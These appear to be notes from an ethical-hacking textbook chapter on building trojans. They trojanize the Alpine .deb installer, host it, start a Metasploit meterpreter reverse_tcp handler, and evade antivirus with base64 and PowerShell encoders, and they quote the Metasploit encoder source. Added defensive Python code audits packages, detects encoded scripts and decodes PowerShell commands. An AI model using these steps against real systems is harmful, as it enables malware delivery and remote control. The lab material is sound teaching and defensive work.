Ethical.Hacking.2021.10:BUILDING TROJANS


Review:

Metasploit Framework reverse-connection process

msfvenom payload-generation command


Hiding an Implant in a Legitimate File

We’ll execute a similar attack here by sending a phishing email
encouraging a victim to download an updated version of the company’s email client,
Alpine, from a fake site. You’ll execute this attack on the Ubuntu desktop machine in
your virtual environment. Let’s begin by creating the Trojan.

We’ll create our trojan by modifying the Alpine installer, the .deb file, so that it
installs the implant as well as Alpine. Download the legitimate Alpine installer by
running the following command:

kali@kali:~/Desktop/Malware/trojans/$ apt-get download alpine

Then extract the contents of the file to the mailTrojan folder by running the following command:

kali@kali:~/Desktop/Malware/trojans/$ engrampa -e mailTrojan

Editing Your .deb File

You’ll need to edit the Alpine installer’s .deb installation file so that it includes your
malicious implant, so let’s walk through the installer’s structure. All installation files must
contain a DEBIAN folder, which contains the files that describe the program and how to
install it. The installation file can also contain other folders such as var for files or usr for
binaries. These folders are copied to a location relative to the /home directory during
installation. For example, the installer would copy the usr folder to /home/usr. The
installer then will read the contents of the DEBIAN folder.
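The layout just described is also what a defender inspects before trusting an installer that arrived from an unexpected source. The following is an added example, not code from the book or from the Alpine project: a Python audit of an extracted .deb tree that confirms DEBIAN/control exists, scans the maintainer scripts dpkg runs as root (preinst, postinst, prerm, postrm) for download-and-execute, decode-and-execute, backgrounding and persistence idioms, and flags executables placed outside the usual binary directories. The pattern list, the directory list and the sample package tree (a constructed postinst that starts a hidden program from usr/share) are assumptions made for this example.

```python
import re
import tempfile
from pathlib import Path

# dpkg runs these scripts as root during install and removal, so they are the
# first place to look in a package of uncertain origin.
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Hypothetical review heuristics assembled for this example, not a complete
# signature set.
SUSPICIOUS_PATTERNS = {
    "download-and-run": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "decode-and-run": re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b"),
    "backgrounded-process": re.compile(r"\b(nohup|setsid)\b|(?<!&)&\s*$"),
    "persistence-path": re.compile(
        r"/etc/cron\.|/etc/rc\.local|\.config/autostart|/etc/systemd/system/"),
}

# Where a normal package puts executables (assumed list); anything executable
# elsewhere in the payload directories deserves a look.
STANDARD_BIN_DIRS = ("bin/", "sbin/", "usr/bin/", "usr/sbin/", "usr/lib/",
                     "usr/libexec/", "usr/games/")


def audit_extracted_deb(root):
    """Audit an extracted .deb tree; return a list of (severity, message)."""
    root = Path(root)
    findings = []
    debian = root / "DEBIAN"
    if not (debian / "control").is_file():
        findings.append(("error", "DEBIAN/control missing: not a valid package layout"))
        return findings

    # 1. Maintainer scripts: flag lines that fetch, decode, background or persist.
    for name in MAINTAINER_SCRIPTS:
        script = debian / name
        if not script.is_file():
            continue
        lines = script.read_text(errors="replace").splitlines()
        for line_no, line in enumerate(lines, 1):
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append(("warn", f"DEBIAN/{name}:{line_no} {label}: {line.strip()}"))

    # 2. Payload files: executables hidden outside the usual binary directories.
    for path in root.rglob("*"):
        rel = path.relative_to(root)
        if rel.parts[0] == "DEBIAN" or not path.is_file():
            continue
        if path.stat().st_mode & 0o111 and not rel.as_posix().startswith(STANDARD_BIN_DIRS):
            findings.append(("warn", f"executable outside standard binary dirs: {rel.as_posix()}"))
    return findings


def build_sample_tree(base):
    """Write a constructed package tree that mimics a trojanized Alpine installer."""
    base = Path(base)
    (base / "DEBIAN").mkdir(parents=True)
    (base / "DEBIAN" / "control").write_text(
        "Package: alpine\nVersion: 0.0-constructed\nArchitecture: amd64\n"
        "Maintainer: Constructed Sample <nobody@example.invalid>\n"
        "Description: constructed sample for the audit example\n")
    (base / "DEBIAN" / "postinst").write_text(
        "#!/bin/sh\n"
        "set -e\n"
        "# ordinary housekeeping a real postinst might do\n"
        "update-desktop-database -q || true\n"
        "# constructed: start a hidden program the legitimate package never shipped\n"
        "nohup /usr/share/alpine/.cache/updater >/dev/null 2>&1 &\n"
        "exit 0\n")
    (base / "DEBIAN" / "postinst").chmod(0o755)
    for rel in ("usr/bin/alpine", "usr/share/alpine/.cache/updater"):
        f = base / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text("#!/bin/sh\n")  # stand-in for the real binaries
        f.chmod(0o755)


def audit_sample():
    """Build the constructed tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_extracted_deb(tmp)


if __name__ == "__main__":
    for severity, message in audit_sample():
        print(f"[{severity}] {message}")
```

Run against the constructed tree, the audit reports the backgrounded process on line 6 of DEBIAN/postinst and the executable under usr/share/alpine/.cache, while the legitimate usr/bin/alpine passes; the same function can be pointed at any folder produced by extracting a real .deb.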


Adding the Implant

Repackage your files into your final .deb installation file.


Hosting the Trojan

kali@kali:~/Desktop/Malware/trojans$ sudo python3 -m http.server 80

Next, you’ll need to start the attacker server that will listen for connections from your
implant. 

kali@kali:~$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST <attacker IP>; set LPORT 8443; run; exit -y"

Downloading the Infected File

Visit http:///mailTrojan.deb to download the file (installation steps omitted).

how to design your own backdoor. But if you want to install one now, consider using the dbd backdoor designed by Kyle Barnthouse and available at https://github.com/gitdurandal/dbd/.



Evading Antivirus by Using Encoders

You can see which antivirus software will detect your implant by uploading it to Virus Total at
https://www.virustotal.com/gui/.

Antivirus systems use signature detection to attempt to find malware. A malware’s
signature is a unique sequence of bytes that represents it. You can see our malicious
implant’s byte sequence by running the xxd command:

kali@kali:~/Desktop/Malware$ xxd malicious

Encoders change a program’s signature by modifying its bytes without changing its functionality. 


Start msf:

sudo msfdb init && msfconsole
msf6 > show encoders 
The base64 Encoder
 

The powershell_base64 encoder uses the base64 encoding scheme, which converts
binary sequences to text, just like the ASCII encoding scheme mentioned in Chapter 5.
However, unlike ASCII, which converts 8-bit sequences, the base64 encoder converts
6-bit sequences to one of 64 possible printable characters. 

Consider converting the Linux ls command from ASCII to base64.

The last section has only four bits, so the remaining two bits are assumed to be 0,
and the padding character (=) is added to the end. Here is the base64-encoded result:
bHM=.

To run it, we decode it and pass it to the shell:

base64 -d <<< bHM= | sh 

base64 --help          
用法:base64 [选项]... [文件]
使用 base64 编码/解码文件或标准输入输出。

如果没有指定文件,或者文件为"-",则从标准输入读取。

必选参数对长短选项同时适用。
  -d, --decode          解码数据
  -i, --ignore-garbag   解码时忽略非字母字符
  -w, --wrap=字符数     在指定的字符数后自动换行(默认为76),0 为禁用自动换行
 

Example:

A Bash script containing the ls command will have a different signature from a file
containing base64-encoded values of the base64 -d <<< bHM= | sh command, even though
they are functionally equivalent. This is because both files are stored using ASCII
encoding. Because the signatures are different, an antivirus program may fail to detect
the malicious file containing the base64 values, as described in Figure 10-8.
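Two points above can be checked in code: how ls becomes bHM= through 6-bit regrouping and padding, and why a byte signature written for the plain script misses its base64-wrapped equivalent. This is an added Python example, not code from the book: base64_by_hand walks the bit groups the text describes and is cross-checked against the standard library, and the signature functions run a naive byte match and a decode-aware match over two constructed one-line scripts. The scripts, the two-byte signature and the regexes for decode-and-pipe idioms are assumptions made for illustration; the decode-aware match is the mitigation, since a scanner that unwraps what a script decodes at runtime sees the original bytes again.

```python
import base64
import re

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def sextets(data):
    """Split the 8-bit bytes of data into 6-bit groups, zero-padding the last
    group as the text describes (for b"ls", 16 bits become three groups)."""
    bits = "".join(f"{byte:08b}" for byte in data)
    bits += "0" * (-len(bits) % 6)
    return [bits[i:i + 6] for i in range(0, len(bits), 6)]


def base64_by_hand(data):
    """Map each 6-bit group to the alphabet and pad with '=' to a multiple of 4."""
    text = "".join(B64_ALPHABET[int(group, 2)] for group in sextets(data))
    return text + "=" * (-len(text) % 4)


def matches_stdlib(data):
    """Cross-check the hand encoder against the standard library."""
    return base64_by_hand(data) == base64.b64encode(data).decode("ascii")


# --- signature matching ------------------------------------------------------

# Constructed scripts: the plain command and its base64-wrapped twin.
PLAIN_SCRIPT = b"#!/bin/sh\nls\n"
ENCODED_SCRIPT = b"#!/bin/sh\nbase64 -d <<< bHM= | sh\n"

# Constructed toy signature. Real signatures are far longer than two bytes;
# the point is only that the encoded file no longer contains these bytes.
SIGNATURE = b"ls"

# Decode-and-pipe idioms a scanner should unwrap before matching (assumed list).
DECODE_IDIOMS = [
    re.compile(rb"base64\s+(?:-d|--decode)\s*<<<\s*[\"']?([A-Za-z0-9+/=]+)"),
    re.compile(rb"echo\s+[\"']?([A-Za-z0-9+/=]+)[\"']?\s*\|\s*base64\s+(?:-d|--decode)"),
]


def naive_signature_match(script, signature=SIGNATURE):
    """Byte-level match only: the model of detection the text says encoders defeat."""
    return signature in script


def decoded_payloads(script):
    """Return the decoded bytes of every base64 blob the script feeds to a decoder."""
    payloads = []
    for idiom in DECODE_IDIOMS:
        for match in idiom.finditer(script):
            try:
                payloads.append(base64.b64decode(match.group(1), validate=True))
            except ValueError:
                continue  # not valid base64; leave it to other checks
    return payloads


def decode_aware_match(script, signature=SIGNATURE):
    """Match against the raw bytes and against anything the script decodes at runtime."""
    return naive_signature_match(script, signature) or any(
        signature in payload for payload in decoded_payloads(script))


if __name__ == "__main__":
    print(sextets(b"ls"), base64_by_hand(b"ls"))
    print("naive, plain script:  ", naive_signature_match(PLAIN_SCRIPT))
    print("naive, encoded script:", naive_signature_match(ENCODED_SCRIPT))
    print("decode-aware, encoded:", decode_aware_match(ENCODED_SCRIPT))
```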

 

Vocabulary note: polymorphic

Writing a Metasploit Module

Reference:

You can view the cmd/powershell_base64 encoder on GitHub (metasploit-framework/powershell_base64.rb at master · rapid7/metasploit-framework).

This encoder is used to encode PowerShell scripts for Windows machines.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Powershell base64 Command Encoder',
      'Description'      => %q{
        This encodes the command as a base64 encoded command for powershell.
      },
      'Author'           => 'Ben Campbell',
      'Arch'             => ARCH_CMD,
      'Platform'         => 'win')
  end

  #
  # Encodes the payload
  #
  def encode_block(state, buf)
    # Skip encoding for empty badchars
    if state.badchars.length == 0
      return buf
    end

    # The generated command line always contains '-' and ' ', so a badchars
    # list forbidding them cannot be satisfied; hand the buffer back unchanged.
    if (state.badchars.include? '-') || (state.badchars.include? ' ')
      return buf
    end

    cmd = encode_buf(buf)

    # If '=' is a bad character, append spaces to the command until the
    # base64 output needs no '=' padding.
    if state.badchars.include? '='
      while cmd.include? '='
        buf << " "
        cmd = encode_buf(buf)
      end
    end

    cmd
  end

  # Wrap the command, convert it to UTF-16LE (what PowerShell expects for -e),
  # base64 it, and build the final command line.
  def encode_buf(buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
    "powershell -w hidden -nop -e #{base64}"
  end
end
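For an analyst the useful direction is the reverse of what the module does: recovering the plaintext from a powershell -e command line seen in process or EDR logs. The following added Python example (not part of the Metasploit project) re-implements encode_buf and its '=' avoidance loop only to generate test input, then decodes such a command line back to text by base64-decoding and then UTF-16LE-decoding, which is the inverse of Rex::Text.to_unicode followed by Rex::Text.encode_base64. The set of flag spellings matched (-e, -ec, -en, -enc, -encodedcommand) and the sample command are assumptions for this example.

```python
import base64
import re


def encode_like_module(buf, avoid_equals=False):
    """Re-implementation (for this example) of the encoder's encode_buf: wrap
    the command, encode it as UTF-16LE, base64 it and build the powershell
    command line. With avoid_equals=True, append spaces until the base64 output
    carries no '=' padding, which is what the badchars loop above does."""
    while True:
        wrapped = f"cmd.exe /c start {buf}".encode("utf-16-le")
        b64 = base64.b64encode(wrapped).decode("ascii")
        if not (avoid_equals and "=" in b64):
            return f"powershell -w hidden -nop -e {b64}"
        # Each space adds two UTF-16LE bytes, so within two rounds the byte
        # length is a multiple of 3 and base64 needs no padding.
        buf += " "


# Flag spellings accepted here (assumed list; PowerShell accepts any
# unambiguous prefix of -EncodedCommand, -e being the shortest).
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_powershell(cmdline):
    """Recover the plaintext from a 'powershell ... -e <base64>' command line.
    Returns None when no encoded command is present. Any '=' padding a log
    may have trimmed is restored before decoding."""
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    token = match.group(1)
    raw = base64.b64decode(token + "=" * (-len(token) % 4))
    # PowerShell expects UTF-16LE text in -EncodedCommand, so decode it that way.
    return raw.decode("utf-16-le")


if __name__ == "__main__":
    line = encode_like_module("whoami", avoid_equals=True)  # constructed sample
    print(line)
    print(repr(decode_encoded_powershell(line)))
```

The decoded text keeps any trailing spaces the encoder appended, which is itself a small tell: a padded command that ends in blanks, or a base64 blob whose length happens to avoid padding, is consistent with an encoder that treats '=' as a bad character.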
